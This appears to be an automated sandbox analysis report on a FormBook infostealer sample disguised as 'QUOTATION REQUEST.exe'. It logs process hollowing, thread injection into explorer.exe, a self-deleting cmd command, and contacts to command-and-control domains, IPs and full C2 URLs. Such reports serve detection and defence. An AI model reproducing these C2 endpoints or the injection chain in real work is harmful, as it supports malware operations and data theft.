Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362A61C mov eax, dword ptr fs:[00000030h] 9_2_0362A61C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362A61C mov eax, dword ptr fs:[00000030h] 9_2_0362A61C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FE620 mov eax, dword ptr fs:[00000030h] 9_2_035FE620
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036216E0 mov ecx, dword ptr fs:[00000030h] 9_2_036216E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036076E2 mov eax, dword ptr fs:[00000030h] 9_2_036076E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03638EC7 mov eax, dword ptr fs:[00000030h] 9_2_03638EC7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036AFEC0 mov eax, dword ptr fs:[00000030h] 9_2_036AFEC0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036236CC mov eax, dword ptr fs:[00000030h] 9_2_036236CC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C8ED6 mov eax, dword ptr fs:[00000030h] 9_2_036C8ED6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036746A7 mov eax, dword ptr fs:[00000030h] 9_2_036746A7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C0EA5 mov eax, dword ptr fs:[00000030h] 9_2_036C0EA5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C0EA5 mov eax, dword ptr fs:[00000030h] 9_2_036C0EA5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C0EA5 mov eax, dword ptr fs:[00000030h] 9_2_036C0EA5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0368FE87 mov eax, dword ptr fs:[00000030h] 9_2_0368FE87
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361C577 mov eax, dword ptr fs:[00000030h] 9_2_0361C577
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361C577 mov eax, dword ptr fs:[00000030h] 9_2_0361C577
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03633D43 mov eax, dword ptr fs:[00000030h] 9_2_03633D43
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03673540 mov eax, dword ptr fs:[00000030h] 9_2_03673540
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036A3D40 mov eax, dword ptr fs:[00000030h] 9_2_036A3D40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03617D50 mov eax, dword ptr fs:[00000030h] 9_2_03617D50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0367A537 mov eax, dword ptr fs:[00000030h] 9_2_0367A537
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BE539 mov eax, dword ptr fs:[00000030h] 9_2_036BE539
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h] 9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C8D34 mov eax, dword ptr fs:[00000030h] 9_2_036C8D34
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03624D3B mov eax, dword ptr fs:[00000030h] 9_2_03624D3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03624D3B mov eax, dword ptr fs:[00000030h] 9_2_03624D3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03624D3B mov eax, dword ptr fs:[00000030h] 9_2_03624D3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FAD30 mov eax, dword ptr fs:[00000030h] 9_2_035FAD30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360D5E0 mov eax, dword ptr fs:[00000030h] 9_2_0360D5E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360D5E0 mov eax, dword ptr fs:[00000030h] 9_2_0360D5E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h] 9_2_036BFDE2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h] 9_2_036BFDE2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h] 9_2_036BFDE2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h] 9_2_036BFDE2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036A8DF1 mov eax, dword ptr fs:[00000030h] 9_2_036A8DF1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h] 9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h] 9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h] 9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676DC9 mov ecx, dword ptr fs:[00000030h] 9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h] 9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h] 9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C05AC mov eax, dword ptr fs:[00000030h] 9_2_036C05AC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C05AC mov eax, dword ptr fs:[00000030h] 9_2_036C05AC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036235A1 mov eax, dword ptr fs:[00000030h] 9_2_036235A1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h] 9_2_035F2D8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h] 9_2_035F2D8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h] 9_2_035F2D8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h] 9_2_035F2D8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h] 9_2_035F2D8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03621DB5 mov eax, dword ptr fs:[00000030h] 9_2_03621DB5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03621DB5 mov eax, dword ptr fs:[00000030h] 9_2_03621DB5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03621DB5 mov eax, dword ptr fs:[00000030h] 9_2_03621DB5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h] 9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h] 9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h] 9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h] 9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362FD9B mov eax, dword ptr fs:[00000030h] 9_2_0362FD9B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362FD9B mov eax, dword ptr fs:[00000030h] 9_2_0362FD9B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0361746D mov eax, dword ptr fs:[00000030h] 9_2_0361746D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362A44B mov eax, dword ptr fs:[00000030h] 9_2_0362A44B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0368C450 mov eax, dword ptr fs:[00000030h] 9_2_0368C450
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0368C450 mov eax, dword ptr fs:[00000030h] 9_2_0368C450
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362BC2C mov eax, dword ptr fs:[00000030h] 9_2_0362BC2C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C740D mov eax, dword ptr fs:[00000030h] 9_2_036C740D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C740D mov eax, dword ptr fs:[00000030h] 9_2_036C740D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C740D mov eax, dword ptr fs:[00000030h] 9_2_036C740D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h] 9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h] 9_2_03676C0A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h] 9_2_03676C0A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h] 9_2_03676C0A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h] 9_2_03676C0A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B14FB mov eax, dword ptr fs:[00000030h] 9_2_036B14FB
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676CF0 mov eax, dword ptr fs:[00000030h] 9_2_03676CF0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676CF0 mov eax, dword ptr fs:[00000030h] 9_2_03676CF0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03676CF0 mov eax, dword ptr fs:[00000030h] 9_2_03676CF0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C8CD6 mov eax, dword ptr fs:[00000030h] 9_2_036C8CD6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360849B mov eax, dword ptr fs:[00000030h] 9_2_0360849B
Enables debug privileges
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.zryld.com
Source: C:\Windows\explorer.exe Domain query: www.sloanksmith.com
Source: C:\Windows\explorer.exe Domain query: www.pedroiniesta.net
Source: C:\Windows\explorer.exe Domain query: www.shop-daily.info
Source: C:\Windows\explorer.exe Domain query: www.letsratethis.com
Source: C:\Windows\explorer.exe Domain query: www.inthebeginningshop.com
Source: C:\Windows\explorer.exe Domain query: www.freecleanlimpieza.com
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.196 80
Source: C:\Windows\explorer.exe Domain query: www.buffalobooze.com
Source: C:\Windows\explorer.exe Domain query: www.madisonroselove.com
Source: C:\Windows\explorer.exe Network Connect: 206.189.50.215 80
Source: C:\Windows\explorer.exe Network Connect: 192.185.131.134 80
Source: C:\Windows\explorer.exe Domain query: www.checkmytradesmanswork.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.colabchat.com
Source: C:\Windows\explorer.exe Network Connect: 74.208.236.36 80
Source: C:\Windows\explorer.exe Domain query: www.bestsellerselect.com
Source: C:\Windows\explorer.exe Domain query: www.graet.design
Source: C:\Windows\explorer.exe Network Connect: 46.30.211.38 80
Source: C:\Windows\explorer.exe Domain query: www.cannabisllp.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 1260000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Source: explorer.exe, 00000005.00000002.482293325.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Queries volume information: C:\Users\user\Desktop\QUOTATION REQUEST.exe VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

Behavior Graph:

Behavior Graph ID: 402973
Sample: QUOTATION REQUEST.exe
Startdate: 03/05/2021
Architecture: WINDOWS
Score: 100
Top-level domain: www.xoyicgv.icu
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures

Process chain:
  QUOTATION REQUEST.exe (started)
    Dropped file: C:\Users\user\...\QUOTATION REQUEST.exe.log, ASCII
    -> QUOTATION REQUEST.exe (started)
       Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
       -> explorer.exe (injected)
          DNS/IP: freecleanlimpieza.com 192.185.131.134, 49752, 80 UNIFIEDLAYER-AS-1US United States
          DNS/IP: www.madisonroselove.com 81.17.18.196, 49748, 80 PLI-ASCH Switzerland
          DNS/IP: 18 other IPs or domains
          Signatures: System process connects to network (likely due to code injection or exploit)
          -> wlanext.exe (started)
             Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
             -> cmd.exe (started)
                -> conhost.exe (started)

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
206.189.50.215 www.pedroiniesta.net United States 14061 DIGITALOCEAN-ASNUS true
192.185.131.134 freecleanlimpieza.com United States 46606 UNIFIEDLAYER-AS-1US true
34.102.136.180 letsratethis.com United States 15169 GOOGLEUS false
74.208.236.36 www.sloanksmith.com United States 8560 ONEANDONE-ASBrauerstrasse48DE true
46.30.211.38 www.graet.design Denmark 51468 ONECOMDK true
81.17.18.196 www.madisonroselove.com Switzerland 51852 PLI-ASCH true

Contacted Domains

Name IP Active
www.madisonroselove.com 81.17.18.196 true
www.sloanksmith.com 74.208.236.36 true
letsratethis.com 34.102.136.180 true
www.pedroiniesta.net 206.189.50.215 true
checkmytradesmanswork.com 34.102.136.180 true
cannabisllp.com 34.102.136.180 true
inthebeginningshop.com 34.102.136.180 true
www.graet.design 46.30.211.38 true
buffalobooze.com 34.102.136.180 true
freecleanlimpieza.com 192.185.131.134 true
www.zryld.com unknown unknown
www.shop-daily.info unknown unknown
www.xoyicgv.icu unknown unknown
www.letsratethis.com unknown unknown
www.inthebeginningshop.com unknown unknown
www.freecleanlimpieza.com unknown unknown
www.buffalobooze.com unknown unknown
www.checkmytradesmanswork.com unknown unknown
www.colabchat.com unknown unknown
www.bestsellerselect.com unknown unknown
www.cannabisllp.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.letsratethis.com/n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al false Avira URL Cloud: safe unknown
http://www.buffalobooze.com/n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al false Avira URL Cloud: safe unknown
www.pedroiniesta.net/n7ad/ true Avira URL Cloud: safe low
http://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al true Avira URL Cloud: safe unknown
http://www.sloanksmith.com/n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al true Avira URL Cloud: safe unknown
http://www.checkmytradesmanswork.com/n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al false Avira URL Cloud: safe unknown
http://www.graet.design/n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al true Avira URL Cloud: safe unknown
http://www.madisonroselove.com/n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al true Avira URL Cloud: safe unknown
http://www.inthebeginningshop.com/n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al false Avira URL Cloud: safe unknown
http://www.pedroiniesta.net/n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al true Avira URL Cloud: safe unknown
http://www.cannabisllp.com/n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al false Avira URL Cloud: safe unknown